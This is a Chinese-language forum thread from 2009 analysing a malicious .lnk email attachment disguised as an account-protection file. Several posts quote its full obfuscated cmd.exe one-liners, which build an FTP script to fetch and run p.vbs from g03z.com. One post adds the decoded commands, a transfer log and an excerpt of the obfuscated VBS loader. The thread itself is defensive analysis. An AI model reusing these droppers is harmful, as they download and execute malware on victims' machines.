作者 主題: *.lnk偽裝檔  (閱讀 15290 次)

0 會員 與 1 訪客 正在閱讀本文。

emillala

  • 憂鬱的高中生
  • ***
  • 文章數: 124
    • 檢視個人資料
*.lnk偽裝檔
« 於: 2009-03-18 10:23 »
前些日子我們董事長在泰國時,他的yahoo  mail寄了封mail給一些幹部和別間公司老闆(應該是直接由通訊錄名單發送)..

以上是前言

這封mail有一附加檔案為"預防帳號盜用.lnk"


我本來以為這是誘使user執行後連結到某網頁致使其產生不良結果

但按右鍵內容一看發現,本應寫上路徑的目標那欄,寫了下面內容..

%windir%\system32\cmd.exe /c echo o web.g03z.com>l&echo aa33>>l&echo bb33>>l&echo set s=echo ge>s.bat&echo set f=t>>s.bat&echo %s%t pnf pnf.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%f%p -s:l>>s.bat&call s.bat&start pnf.vbs&del l s.bat&




哇...這根本不是*.lnk該有的作用,已經像是批次檔了

我是第一次看見把*.lnk當成*.bat或*.cmd的檔案在用

真是無所不用其極呀 = =



剛剛發現,當我把它加入壓縮檔後,會變成cmd.exe.........




http://www.badongo.com/cn/file/13925908--->附件內容供參考
« 上次編輯: 2009-03-18 10:42 由 emillala »

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
回覆: *.lnk偽裝檔
« 回覆 #1 於: 2009-03-18 10:31 »
可以參考一下比較早以前的文章 http://rogerspeaking.com/2009/02/1893 .
*.lnk通常不會是附件的檔案,建議公司mail要擋這類型的附件.
另外董事長的PC應該有問題摟,主動關心一下吧 :)

emillala

  • 憂鬱的高中生
  • ***
  • 文章數: 124
    • 檢視個人資料
回覆: *.lnk偽裝檔
« 回覆 #2 於: 2009-03-18 10:36 »
可以參考一下比較早以前的文章 http://rogerspeaking.com/2009/02/1893 .
*.lnk通常不會是附件的檔案,建議公司mail要擋這類型的附件.
另外董事長的PC應該有問題摟,主動關心一下吧 :)

我之前google了一下

好像不是user的問題

是直接從yahoo mail發的

因為之前也發生過其他人的yahoo發出偽裝檔給某人
(壓縮檔名稱"這是不是你的檔案",然後壓縮檔內容是收件者硬碟裡的一些檔案,而眾多檔案中藏了一個cmd.exe)

把yahoo mail密碼改掉就沒發生過了

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
回覆: *.lnk偽裝檔
« 回覆 #3 於: 2009-03-18 11:46 »
yahoo自己寄信?那個yahoo信箱會自己寄信的?沒user的帳號密碼怎麼寄信?
那user的帳號密碼要怎麼來? user都透過什麼上yahoo看信寄信?

請想一想...想清楚你就不會這樣認為了.

threeseconds

  • 俺是博士!
  • *****
  • 文章數: 1368
    • 檢視個人資料
    • http://www.3sec.tw
回覆: *.lnk偽裝檔
« 回覆 #4 於: 2009-04-06 15:53 »
今天我轄區也收到這個案例了,一樣是 .lnk 檔,檔案內部如下
代碼: [選擇]
%ComSpec% /c echo set a=.>s.bat&echo echo o www%a%g03z%a%com^>l>>s.bat&call s.bat&echo aa33>>l&echo bb33>>l&echo set sa=echo g>s.bat&echo set vt=tp ->>s.bat&echo %sa%et q p.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%vt%s:l>>s.bat&call s.bat&start p.vbs&想做實驗的人可以自行試試看....

該病毒行為是連上 ftp://www.g03z.com
下載病毒執行檔 p.vbs
set 變數的方式令人匪夷所思到想吐血.....
« 上次編輯: 2009-04-06 15:59 由 threeseconds »
本文作者為天線寶寶,長期關注兒童智力發展狀態。

爬起來吐血

  • 可愛的小學生
  • *
  • 文章數: 1
    • 檢視個人資料
回覆: *.lnk偽裝檔
« 回覆 #5 於: 2009-06-09 11:32 »
小弟有點不明白

那個^符號是什麽意思啊

還有 為什麽echo echo bye 這裏有兩個echo

hoyo

  • 榮譽博士
  • 俺是博士!
  • *****
  • 文章數: 4033
  • 性別: 男
  • 有需要的時候,學習就不會分階段。
    • 檢視個人資料
    • 樂咖黑電腦學習網
回覆: *.lnk偽裝檔
« 回覆 #6 於: 2009-06-09 11:48 »
今天我轄區也收到這個案例了,一樣是 .lnk 檔,檔案內部如下
代碼: [選擇]
%ComSpec% /c echo set a=.>s.bat&echo echo o www%a%g03z%a%com^>l>>s.bat&call s.bat&echo aa33>>l&echo bb33>>l&echo set sa=echo g>s.bat&echo set vt=tp ->>s.bat&echo %sa%et q p.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%vt%s:l>>s.bat&call s.bat&start p.vbs&想做實驗的人可以自行試試看....

該病毒行為是連上 ftp://www.g03z.com
下載病毒執行檔 p.vbs
set 變數的方式令人匪夷所思到想吐血.....

執行後會自動分解成

代碼: [選擇]
C:\>set a=.

C:\>echo o www.g03z.com 1>l

C:\>set sa=echo g

C:\>set vt=tp -

C:\>echo get q p.vbs 1>>l

C:\>echo bye 1>>l

C:\>ftp -s:l
ftp> o www.g03z.com
Connected to www.g03z.com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www.g03z.com:(none)):
331 User name okay, need password.

230 User logged in, proceed.
ftp> get q p.vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for q (1181 Bytes).
226-Maximum disk quota limited to 102400 kBytes
    Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1181 bytes received in 0.03Seconds 38.10Kbytes/sec.
ftp> bye
221 Goodbye!

C:\>

p.vbs 簡略內容
代碼: [選擇]
sub k
for i=1 to UBound(strs)
        runner=runner&chr(strs(i)-547)
next
Execute runner
end sub
strs=array(560,630,648,663,579,654,654,579......很長以下省略)
k

k 實際程式碼請參照圖片 ..... (懶得重打一次)
« 上次編輯: 2009-06-09 11:49 由 hoyo »
受人與魚,不如授人與漁
上海自來水來自海上;倫敦好奇人奇好敦倫

jlovet

  • 憂鬱的高中生
  • ***
  • 文章數: 126
    • 檢視個人資料
回覆: *.lnk偽裝檔
« 回覆 #7 於: 2009-06-09 13:53 »
那個主機代管的admin這麼告訴我

Dear sir,
 
    We had taken appropriate action immediately as to warning user.
 
Sincerely Yours,
 
Chief Telecom Inc.

我看他的意思好像是說,我們馬上給這使用者一支口頭警告。
然後就bye了。

我跟Yahoo說,要他們把lnk擋下來。
他告訴我這有可能是偽造地址的郵件,我就又把mail header寄過去。
然後,那個被盜用帳號的可憐人似乎就被封鎖帳號了。
之後還是不斷收到類似的信,竟然都是去抓g03z.com....
上面有四個檔案吧, p,q,s,d

常用的防毒軟體要不是會抓到前面兩個script
就是會抓到後面兩個exe
Bitdefender除外,寄sample過去之後似乎也沒有甚麼反應,讓我對我家的電腦有點擔心,Bitdefender beta使用中...